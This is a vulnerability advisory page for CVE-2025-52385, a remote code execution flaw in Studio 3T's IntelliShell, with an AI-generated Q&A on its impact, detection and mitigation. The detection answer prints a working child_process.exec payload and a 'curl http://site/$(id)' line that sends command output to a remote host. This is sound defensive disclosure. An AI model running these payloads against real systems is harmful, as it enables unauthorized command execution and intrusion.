CVE-2025-52385
BaseFortify
Publication date: 2025-08-13
Last updated on: 2025-08-14
Assigner: MITRE
Description
CVSS Scores
EPSS Scores
| Metric | Value |
|---|---|
| Probability | |
| Percentile | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| studio3t | studio_3t | 2025.1.0 |
| studio3t | studio_3t | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-52385 is a critical remote code execution vulnerability in Studio 3T version 2025.1.0 and earlier. It occurs because the IntelliShell component allows attackers to send a crafted JavaScript payload that exploits the Node.js child_process module to execute arbitrary operating system commands remotely. The attacker injects malicious code through IntelliShell, which uses child_process.exec to run OS commands without proper input validation or sanitization. This is a blind execution vulnerability, meaning the attacker does not receive direct output from the commands executed. [1]
How can this vulnerability impact me?
This vulnerability can lead to remote code execution, allowing attackers to run arbitrary commands on the affected system. Potential impacts include denial of service, privilege escalation, and unauthorized control over the system. Attackers can exploit this flaw to compromise system integrity, confidentiality, and availability by executing malicious commands remotely. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to execute a crafted JavaScript payload through the IntelliShell component of Studio 3T that uses the child_process.exec function to run OS commands remotely. For example, running a payload like `const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));` can help verify if arbitrary command execution is possible. Alternatively, commands such as `curl http://site/$(id)` can be used to confirm exploitation by observing if the remote server receives the request, indicating command execution. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include upgrading Studio 3T to a patched version once available, or avoiding the use of IntelliShell with untrusted MongoDB connections. Additionally, vendors should restrict or sanitize inputs to the child_process module within IntelliShell to prevent unauthorized command execution. From a broader perspective, applying strict input validation, avoiding dynamic code generation, and using sandboxing techniques can help reduce the risk of code injection vulnerabilities. [1, 2]